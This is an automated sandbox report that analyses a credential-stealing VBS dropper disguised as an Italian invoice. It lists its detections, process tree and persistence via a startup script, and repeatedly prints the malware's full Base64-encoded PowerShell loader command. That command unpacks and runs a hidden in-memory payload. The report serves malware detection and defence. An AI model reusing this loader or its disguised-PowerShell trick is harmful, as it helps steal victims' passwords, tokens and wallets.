Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Fattura-24SC-99245969925904728562.vbs

Overview

General Information

Sample name:Fattura-24SC-99245969925904728562.vbs
Analysis ID:1546109
MD5:6f5153972552fdc27d794087d11c0f12
SHA1:2392e3fb23d622dd6ef791b388bd0acadef3f069
SHA256:577564ce2face042cce2f1f7f2a28c42a96d08b3929e63497da486fd90d295d0
Tags:SPAM-ITAvbsuser-JAMESWT_MHT
Infos:

Detection

Discord Token Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious encrypted Powershell command line found
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Yara detected AntiVM3
Yara detected Discord Token Stealer
.NET source code contains potential unpacker
AI detected suspicious sample
Creates processes via WMI
Drops VBS files to the startup folder
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Powershell is started from unusual location (likely to bypass HIPS)
Reads the Security eventlog
Reads the System eventlog
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
Sigma detected: PowerShell Script Run in AppData
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 7560 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • Fattura-24SC-99245969925904728562.vbs.exe (PID: 7764 cmdline: "C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe" -enc JABGAHAAdABqAHgAcgB4AGkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQAuAE0AYQBpAG4ATQBvAGQAdQBsAGUALgBGAGkAbABlAE4AYQBtAGUALgBSAGUAcABsAGEAYwBlACgAJwAuAGUAeABlACcALAAnACcAKQA7ACQATgBrAGwAcwBlAHgAdAAgAD0AIABnAGUAdAAtAGMAbwBuAHQAZQBuAHQAIAAkAEYAcAB0AGoAeAByAHgAaQAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBMAGEAcwB0ACAAMQA7ACAAJABaAG8AaQBsAGUAdwBmAGMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQATgBrAGwAcwBlAHgAdAAuAFIAZQBwAGwAYQBjAGUAKAAnAFIARQBNACAAJwAsACAAJwAnACkALgBSAGUAcABsAGEAYwBlACgAJwBAACcALAAgACcAQQAnACkAKQA7ACQAWgBwAHEAbABxAGEAegBpAGEAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAFoAbwBpAGwAZQB3AGYAYwAgACkAOwAkAEQAawBtAGIAcAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQA7ACQASQB2AHkAZwB5AG8AcwB2ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAFoAcABxAGwAcQBhAHoAaQBhACwAIAAoAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApADsAJABJAHYAeQBnAHkAbwBzAHYALgBDAG8AcAB5AFQAbwAoACAAJABEAGsAbQBiAHAAIAApADsAJABJAHYAeQBnAHkAbwBzAHYALgBDAGwAbwBzAGUAKAApADsAJABaAHAAcQBsAHEAYQB6AGkAYQAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAFoAbwBpAGwAZQB3AGYAYwAgAD0AIAAkAEQAawBtAGIAcAAuAFQAbwBBAHIAcgBhAHkAKAApADsAWwBBAHIAcgBhAHkAXQA6ADoAUgBlAHYAZQByAHMAZQAoACQAWgBvAGkAbABlAHcAZgBjACkAOwAgACQAUABtAGsAZgBxACAAPQAgAFsAUwB5AHMAdABlAG0ALgBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoACQAWgBvAGkAbABlAHcAZgBjACkAOwAgACQAWgB5AHMAeAB4AGUAeABnAHEAbwAgAD0AIAAkAFAAbQBrAGYAcQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgAFsAUwB5AHMAdABlAG0ALgBEAGUAbABlAGcAYQB0AGUAXQA6ADoAQwByAGUAYQB0AGUARABlAGwAZQBnAGEAdABlACgAWwBBAGMAdABpAG8AbgBdACwAIAAkAFoAeQBzAHgAeABlAHgAZwBxAG8ALgBEAGUAYwBsAGEAcgBpAG4AZwBUAHkAcABlACwAIAAkAFoAeQBzAHgAeABlAHgAZwBxAG8ALgBOAGEAbQBlACkALgBEAHkAbgBhAG0AaQBjAEkAbgB2AG8AawBlACgAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwA MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • InstallUtil.exe (PID: 7928 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • cmd.exe (PID: 7636 cmdline: cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe" /Y MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • wscript.exe (PID: 8168 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OSDescription.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • wscript.exe (PID: 968 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\OSDescription.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
      • cmd.exe (PID: 6964 cmdline: cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\user\AppData\Roaming\OSDescription.vbs.exe" /Y MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • OSDescription.vbs.exe (PID: 6024 cmdline: "C:\Users\user\AppData\Roaming\OSDescription.vbs.exe" -enc JABGAHAAdABqAHgAcgB4AGkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQAuAE0AYQBpAG4ATQBvAGQAdQBsAGUALgBGAGkAbABlAE4AYQBtAGUALgBSAGUAcABsAGEAYwBlACgAJwAuAGUAeABlACcALAAnACcAKQA7ACQATgBrAGwAcwBlAHgAdAAgAD0AIABnAGUAdAAtAGMAbwBuAHQAZQBuAHQAIAAkAEYAcAB0AGoAeAByAHgAaQAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBMAGEAcwB0ACAAMQA7ACAAJABaAG8AaQBsAGUAdwBmAGMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQATgBrAGwAcwBlAHgAdAAuAFIAZQBwAGwAYQBjAGUAKAAnAFIARQBNACAAJwAsACAAJwAnACkALgBSAGUAcABsAGEAYwBlACgAJwBAACcALAAgACcAQQAnACkAKQA7ACQAWgBwAHEAbABxAGEAegBpAGEAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAFoAbwBpAGwAZQB3AGYAYwAgACkAOwAkAEQAawBtAGIAcAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQA7ACQASQB2AHkAZwB5AG8AcwB2ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAFoAcABxAGwAcQBhAHoAaQBhACwAIAAoAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApADsAJABJAHYAeQBnAHkAbwBzAHYALgBDAG8AcAB5AFQAbwAoACAAJABEAGsAbQBiAHAAIAApADsAJABJAHYAeQBnAHkAbwBzAHYALgBDAGwAbwBzAGUAKAApADsAJABaAHAAcQBsAHEAYQB6AGkAYQAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAFoAbwBpAGwAZQB3AGYAYwAgAD0AIAAkAEQAawBtAGIAcAAuAFQAbwBBAHIAcgBhAHkAKAApADsAWwBBAHIAcgBhAHkAXQA6ADoAUgBlAHYAZQByAHMAZQAoACQAWgBvAGkAbABlAHcAZgBjACkAOwAgACQAUABtAGsAZgBxACAAPQAgAFsAUwB5AHMAdABlAG0ALgBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoACQAWgBvAGkAbABlAHcAZgBjACkAOwAgACQAWgB5AHMAeAB4AGUAeABnAHEAbwAgAD0AIAAkAFAAbQBrAGYAcQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgAFsAUwB5AHMAdABlAG0ALgBEAGUAbABlAGcAYQB0AGUAXQA6ADoAQwByAGUAYQB0AGUARABlAGwAZQBnAGEAdABlACgAWwBBAGMAdABpAG8AbgBdACwAIAAkAFoAeQBzAHgAeABlAHgAZwBxAG8ALgBEAGUAYwBsAGEAcgBpAG4AZwBUAHkAcABlACwAIAAkAFoAeQBzAHgAeABlAHgAZwBxAG8ALgBOAGEAbQBlACkALgBEAHkAbgBhAG0AaQBjAEkAbgB2AG8AawBlACgAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwA MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 6196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • InstallUtil.exe (PID: 2980 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000007.00000002.1422431718.0000000009F60000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
    00000011.00000002.1617686351.00000000031E9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000009.00000002.1452882158.000000000293F000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000011.00000002.1617686351.0000000003034000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000011.00000002.1617686351.0000000002F6C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
            Click to see the 19 entries
            SourceRuleDescriptionAuthorStrings
            9.2.InstallUtil.exe.23e0000.1.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
              7.2.Fattura-24SC-99245969925904728562.vbs.exe.9f60000.5.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security

                System Summary

                barindex
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe" -enc JABGAHAAdABqAHgAcgB4AGkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQAuAE0AYQBpAG4ATQBvAGQAdQBsAGUALgBGAGkAbABlAE4AYQBtAGUALgBSAGUAcABsAGEAYwBlACgAJwAuAGUAeABlACcALAAnACcAKQA7ACQATgBrAGwAcwBlAHgAdAAgAD0AIABnAGUAdAAtAGMAbwBuAHQAZQBuAHQAIAAkAEYAcAB0AGoAeAByAHgAaQAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBMAGEAcwB0ACAAMQA7ACAAJABaAG8AaQBsAGUAdwBmAGMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQATgBrAGwAcwBlAHgAdAAuAFIAZQBwAGwAYQBjAGUAKAAnAFIARQBNACAAJwAsACAAJwAnACkALgBSAGUAcABsAGEAYwBlACgAJwBAACcALAAgACcAQQAnACkAKQA7ACQAWgBwAHEAbABxAGEAegBpAGEAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAFoAbwBpAGwAZQB3AGYAYwAgACkAOwAkAEQAawBtAGIAcAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQA7ACQASQB2AHkAZwB5AG8AcwB2ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAFoAcABxAGwAcQBhAHoAaQBhACwAIAAoAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApADsAJABJAHYAeQBnAHkAbwBzAHYALgBDAG8AcAB5AFQAbwAoACAAJABEAGsAbQBiAHAAIAApADsAJABJAHYAeQBnAHkAbwBzAHYALgBDAGwAbwBzAGUAKAApADsAJABaAHAAcQBsAHEAYQB6AGkAYQAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAFoAbwBpAGwAZQB3AGYAYwAgAD0AIAAkAEQAawBtAGIAcAAuAFQAbwBBAHIAcgBhAHkAKAApADsAWwBBAHIAcgBhAHkAXQA6ADoAUgBlAHYAZQByAHMAZQAoACQAWgBvAGkAbABlAHcAZgBjACkAOwAgACQAUABtAGsAZgBxACAAPQAgAFsAUwB5AHMAdABlAG0ALgBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoACQAWgBvAGkAbABlAHcAZgBjACkAOwAgACQAWgB5AHMAeAB4AGUAeABnAHEAbwAgAD0AIAAkAFAAbQBrAGYAcQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgAFsAUwB5AHMAdABlAG0ALgBEAGUAbABlAGcAYQB0AGUAXQA6ADoAQwByAGUAYQB0AGUARABlAGwAZQBnAGEAdABlACgAWwBBAGMAdABpAG8AbgBdACwAIAAkAFoAeQBzAHgAeABlAHgAZwBxAG8ALgBEAGUAYwBsAGEAcgBpAG4AZwBUAHkAcABlACwAIAAkAFoAeQBzAHgAeABlAHgAZwBxAG8ALgBOAGEAbQBlACkALgBEAHkAbgBhAG0AaQBjAEkAbgB2AG8AawBlACgAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwA, CommandLine: "C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe" -enc JABGAHAAdABqAHgAcgB4AGkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQAuAE0AYQBpAG4ATQBvAGQAdQBsAGUALgBGAGkAbABlAE4AYQBtAGUALgBSAGUAcABsAGEAYwBlACgAJwAuAGUAeABlACcALAAnACcAKQA7ACQATgBrAGwAcwBlAHgAdAAgAD0AIABnAGUAdAAtAGMAbwBuAHQAZQBuAHQAIAAkAEYAcAB0AGoAeAByAHgAaQAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBMAGEAcwB0ACAAMQA7ACAAJABaAG8AaQBsAGUAdwBmAGMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQATgBrAGwAcwBlAHgAdAAuAFIAZQBwAGwAYQBjAGUAKAAnAFIARQBNACAAJwAsACAAJwAnACkALgBSAGUAcABsAGEAYwBlACgAJw
                Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs", ProcessId: 7560, ProcessName: wscript.exe
                Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe, ProcessId: 7764, TargetFilename: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_05eouqb0.jr2.ps1
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community: Data: Command: cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\user\AppData\Roaming\OSDescription.vbs.exe" /Y, CommandLine: cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\user\AppData\Roaming\OSDescription.vbs.exe" /Y, CommandLine|base64offset|contains: rg, Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\OSDescription.vbs" , ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 968, ParentProcessName: wscript.exe, ProcessCommandLine: cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\user\AppData\Roaming\OSDescription.vbs.exe" /Y, ProcessId: 6964, ProcessName: cmd.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe" /Y, CommandLine: cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe" /Y, CommandLine|base64offset|contains: rg, Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 968, ProcessCommandLine: cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe" /Y, ProcessId: 7636, ProcessName: cmd.exe
                Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs", ProcessId: 7560, ProcessName: wscript.exe

                Data Obfuscation

                barindex
                Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe, ProcessId: 7764, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OSDescription.vbs
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-31T14:16:23.610522+010020229301A Network Trojan was detected4.175.87.197443192.168.2.749740TCP
                2024-10-31T14:17:08.011978+010020229301A Network Trojan was detected20.12.23.50443192.168.2.749973TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: Fattura-24SC-99245969925904728562.vbsReversingLabs: Detection: 26%
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.logJump to behavior
                Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1423198807.000000000A040000.00000004.08000000.00040000.00000000.sdmp, Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1377378668.0000000005437000.00000004.00000800.00020000.00000000.sdmp, OSDescription.vbs.exe, 0000000F.00000002.1547078793.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, OSDescription.vbs.exe, 0000000F.00000002.1567720148.0000000006386000.00000004.00000800.00020000.00000000.sdmp, OSDescription.vbs.exe, 0000000F.00000002.1567720148.00000000061E6000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1423198807.000000000A040000.00000004.08000000.00040000.00000000.sdmp, Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1377378668.0000000005437000.00000004.00000800.00020000.00000000.sdmp, OSDescription.vbs.exe, 0000000F.00000002.1547078793.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, OSDescription.vbs.exe, 0000000F.00000002.1567720148.0000000006386000.00000004.00000800.00020000.00000000.sdmp, OSDescription.vbs.exe, 0000000F.00000002.1567720148.00000000061E6000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: powershell.pdbUGP source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000000.1312087444.00000000003D1000.00000020.00000001.01000000.00000005.sdmp, OSDescription.vbs.exe, 0000000F.00000000.1514068078.0000000000348000.00000020.00000001.01000000.0000000C.sdmp, OSDescription.vbs.exe.13.dr, Fattura-24SC-99245969925904728562.vbs.exe.4.dr
                Source: Binary string: protobuf-net.pdbSHA256}Lq source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1415758783.0000000008910000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: powershell.pdb source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000000.1312087444.00000000003D1000.00000020.00000001.01000000.00000005.sdmp, OSDescription.vbs.exe, 0000000F.00000000.1514068078.0000000000348000.00000020.00000001.01000000.0000000C.sdmp, OSDescription.vbs.exe.13.dr, Fattura-24SC-99245969925904728562.vbs.exe.4.dr
                Source: Binary string: protobuf-net.pdb source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1415758783.0000000008910000.00000004.08000000.00040000.00000000.sdmp
                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\userJump to behavior
                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppDataJump to behavior
                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeCode function: 4x nop then jmp 0A033B28h7_2_0A033A68
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeCode function: 4x nop then jmp 0A033B28h7_2_0A033A70
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h7_2_0A0386F9
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h7_2_0A038700
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h7_2_0A0ED8F8
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h15_2_09CAD8F8
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeCode function: 4x nop then jmp 09CE3B28h15_2_09CE3A68
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeCode function: 4x nop then jmp 09CE3B28h15_2_09CE3A70
